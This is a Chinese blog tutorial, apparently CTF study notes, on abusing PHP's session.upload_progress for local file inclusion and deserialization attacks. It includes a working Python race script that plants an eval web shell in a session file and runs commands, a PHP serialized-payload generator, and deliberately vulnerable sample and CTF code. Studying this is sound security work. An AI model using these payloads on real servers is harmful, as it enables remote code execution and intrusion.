session.upload_progress进行文件包含和反序列化学习

已于 2022-09-07 15:56:39 修改
阅读量438 收藏 3
点赞数
分类专栏: web安全 文章标签: php 安全
于 2022-09-07 15:56:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126739376
版权

目录

前言:

php中的session.upload_progress

session相关配置及session 反序列化。

利用session.upload_progress 进行文件包含利用。

实例代码:

分析:

问题一:

解答一:

问题二:

解答二:

利用条件:

利用session.upload_progress进行反序列化攻击

示例代码

分析:

问题一:

解答一:

利用脚本:

前言:

转载一篇 好文章,写在这里,就当作自己的笔记啦。

利用PHP中的session.upload_progress 功能作为跳板,从而进行文件包含和反序列化。

php中的session.upload_progress

这个功能在php5.4以上能够利用。

在 php.ini 有以下几个默认选项。

 1. session.upload_progress.enabled = on

2. session.upload_progress.cleanup = on

3. session.upload_progress.prefix = "upload_progress_"

4. session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"

5. session.upload_progress.freq = "1%"

6. session.upload_progress.min_freq = "1"

只需要了解前四个配置:

enabled=on 表示 upload_progress 功能开始,意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间)储存在session 中;

cleanup= on 表示当文件上传结束后,php 将会立刻清空文件当中的内容。这选项很重要。

 name当他出现在表单中,php将会报告上传进度,最大的好处是,它的值可控;

prefix + name 将表示为 session 中的键名 。

session相关配置及session 反序列化。

------

PHP中SESSION反序列化机制 | Spoock

另外  session配置中还有一个重要选项。

session.user_strict_mode = off 这个选项默认为off , 表示我们对 Cookie 中 sessionid 可控。这一点相关重要。

利用session.upload_progress 进行文件包含利用。

环境:

php 7.3

win10

实例代码:

<?php
$b=$_GET['file'];
include "$b";
?>

存在一个文件包含漏洞,但是找不到一个可以包含的恶意文件,我们可以利用session.upload_progress将 恶意语句写入 session文件,从而包含session 文件。前提是要知道session 文件的存放位置。

分析:

问题一:

代码里 没有session_start(),如何创建 session文件?

解答一:

其实,如果 session.auto_start=On,则php 在接收请求的时候会自动初始化session,不需要再执行session_start()。但默认情况下,这个选项是关闭的。

但session还有一个默认选项,session.user_strict_mode(严格会话模式)默认值为0(关闭),此时用户是可以定义自己的 session ID 的。比如,我们在Cookie 中设置 PHPsessid = snowy 那么php将会在服务器创建一个文件:/tmp/sess_snowy .   即使用户没有初始化session,php也会自动初始化session 并产生一个键值,这个键值有 ini.get("session.upload_progress.prefix") + 由我们构造的seesion.upload_progress值组成,最后被写入sess_文件里。

问题二:

如果默认配置 session.upload_progress.cleanup = on 启用了文件上传后,session 文件内容立刻清空,  该 如何 RCE呢?

解答二:

此时可以使用条件竞争,在session 文件内容清空前进行包含利用:

脚本:

#coding=utf-8
​
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":"system('whoami');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://127.0.0.1:5555/test56.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://127.0.0.1:5555/test56.php?file=session/sess_'+sessid,data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in xrange(1,30): 
            threading.Thread(target=write,args=(session,)).start()
​
        for i in xrange(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

本地测试一下。

 直接给我环境跑炸了,,,,

CTF题目

<html>
    <?php
    error_reporting(0);
    $file = $_GET["file"];
    $payload = $_GET["payload"];
    if(!isset($file)){
        echo 'Missing parameter'.'<br>';
    }
    if(preg_match("/flag/",$file)){
        die('hack attacked!!!');
    }
    @include($file);
    if(isset($payload)){
        $url = parse_url($_SERVER['REQUEST_URI']);
        parse_str($url['query'],$query);
        foreach($query as $value){
            if (preg_match("/flag/",$value)) {
                die('stop hacking!');
                exit();
            }
        }
        $payload = unserialize($payload);
    }else{
       echo "Missing parameters";
    }
    ?>
    <!--Please test index.php?file=xxx.php -->
    <!--Please get the source of hint.php-->
    </html>

在代码前几行可以看到,场景和前面的示例代码类似,只不过对变量$file加了过滤,不过没什么影响。

利用思路一样,这里就不再说了,网上也有相应的解法。

利用条件:

1. 存在文件包含漏洞

2. 知道session文件存放路径,可以尝试默认路径

3. 具有读取和写入session文件的权限

利用session.upload_progress进行反序列化攻击

示例代码

<?php
error_reporting(0);
date_default_timezone_set("Asia/Shanghai");
ini_set('session.serialize_handler','php');
session_start();
class Door{
    public $handle;
​
    function __construct() {
        $this->handle=new TimeNow();
    }
​
    function __destruct() {
        $this->handle->action();
    }
}
class TimeNow {
    function action() {
        echo "你的访问时间:"."  ".date('Y-m-d H:i:s',time());
    }
}
class  IP{
    public $ip;
    function __construct() {
        $this->ip = 'echo $_SERVER["REMOTE_ADDR"];';
    }
    function action() {
        eval($this->ip);
    }
}
?>

分析:

问题一:

整个代码没有参数可控的地方,该通过什么方法来进行反序列化利用呢?

解答一:

这里,利用PHP_SESSION_UPLOAD_PROGRESS 上传文件,其中利用文件名可控,从而构造恶意序列化语句,写入session文件。

另外,与文件包含利用一样,需要竞争

利用脚本:

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
class Door{
    public $handle;
​
    function __construct() {
        $this->handle = new IP();
    }
​
    function __destruct() {
        $this->handle->action();
    }
}
class TimeNow {
    function action() {
        echo "你的访问时间:"."  ".date('Y-m-d H:i:s',time());
    }
}
​
class  IP{
    public $ip;
    function __construct() {
        //$this->ip='payload';
        $this->ip='phpinfo();';
        //$this->ip='print_r(scandir('/'));';
    }
    function action() {
        eval($this->ip);
    }
}
$a=new Door();
$b=serialize($a);
$c=addslashes($b);
$d=str_replace("O:4:","|O:4:",$c);
echo $d;
?>

这里 不细说了 想要了解的 看下这篇文章:

PHP中SESSION反序列化机制 | Spoock

snowlyzz
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DB为何大量出现select @@session.tx_read_only 详解
12-15
发现问题 在一次捞取Top SQL中,发现DB大量执行 select @@session.tx_read_only ,几乎每一条DML语句前,都会有这么一个sql。但是应用层并没有做特殊处理,那么这个SQL语句有什么作用?是谁执行了它? 详细介绍 此sql的作用主要是判断事务是否为只读事务。MySQL自身会对只读事务做优化,这是 MySQL5.6.5 版本 以后才出现的。 http://dev.mysql.com/doc/refman/5.6/en/server-system-variables.html#sysvar_tx_read_only 定位到MySQL的驱动包 ConnectionI
php7 uploadprogress,PHP基于session.upload_progress 实现文件上传进度显示功能详解
weixin_30209891的博客
03-12 278
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下:介绍session.upload_progressPHP5.4的新特征。当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以...
文件包含漏洞奇技淫巧——session.upload_progress
最新发布
YV_LING的博客
09-03 145
刷题时遇到的一道题目,一直没有思路,看完wp之后学会的新姿势。
对于session.upload_progress漏洞的理解
Huamang的博客
03-06 976
先放两个文章: https://www.freebuf.com/vuls/202819.html https://www.cnblogs.com/NPFS/p/13795170.html 利用session.upload_progress进行文件包含: 信息介绍: session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。 比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v
session.upload_progress反序列化学习
..
03-10 1802
Session的配置选项和存储方式 在php.ini中存在四项配置项: session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来...
PHP基于session.upload_progress 实现文件上传进度显示功能详解
01-02
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下: 介绍 session.upload_progressPHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,上传进度可
session.upload_progress文件包含
Aiwin的博客
05-29 787
session.upload_progress文件包含
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 550
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
文件上传进度upload_progress
u014391889的博客
07-25 3667
前端: &lt;form id="upload-form" action="upload.php" method="POST" enctype="multipart/form-data"&gt;         &lt;input type="hidden" name="&lt;?php echo ini_get("session.upload_progr
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 754
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
uploadProgress上传显示进度条
08-27
uploadProgress上传显示进度条
PHP session有效期session.gc_maxlifetime
12-19
一个已知管用的方法是,使用session_set_save_handler,接管所有的session管理工作,一般是把session信息存储到数据库,这样可以通过SQL语句来删除所有过期的session,精确地控制session的有效期。这也是基于PHP的...
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1918
利用session.upload_progress进行文件包含
sessionsession.upload_progress再认识
Monica的博客
10-25 1095
结合: WEB82-session文件包含 WEB263-session反序列化 进一步了解sessionsession.upload_progress知识 1、cleanup 只会清除session文件内容,不会清楚session文件 2、当页面使用ini_set修改php.ini文件的内容时,phpinfo()里面的local value内容也会修改 我们在脚本使用了ini_set('session.serialize_handler', 'php'); 而php.ini中.
php-session文件包含反序列化(对session.upload_progress的利用)
unexpectedthing的博客
02-11 1594
文章目录前言session的简介PHPsession的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含反序列化的总结。 也就是关于php-session文件包含反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
基于session.upload_progress 的文件上传进度显示
koastal的博客
10-31 5621
介绍session.upload_progressPHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的s
php上传完没进度条_php如何实现上传进度条
weixin_29027305的博客
03-08 133
php实现上传进度条的方法:首先向服务器端上传一个文件;然后用PHP将此次文件上传的详细信息存储在session当中;接着用Ajax周期性的请求一个服务器端脚本;最后通过浏览器端的Javascript显示更新进度条即可。实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。PHP手册对于session上传进度是这么介绍的:当 session...
利用session.upload_progress进行文件包含
qq_44657899的博客
10-26 3984
前言 又一种新的文件包含利用方法,记录一下复现过程。 学习自:LFI 绕过 Session 包含限制 Getshell 利用session.upload_progress进行文件包含反序列化渗透 文章目录前言kali本地测试利用burp利用python脚本 kali本地测试 所有配置都为默认配置 大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该
php session.save_path
06-11
php session.save_path 是用来设置 PHP 应用程序存储 Session 数据的路径。Session 是一种在 Web 应用程序中用来存储用户数据...例如,可以将 session.save_path 设置为 "/tmp",以将 Session 数据存储在 /tmp 目录中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值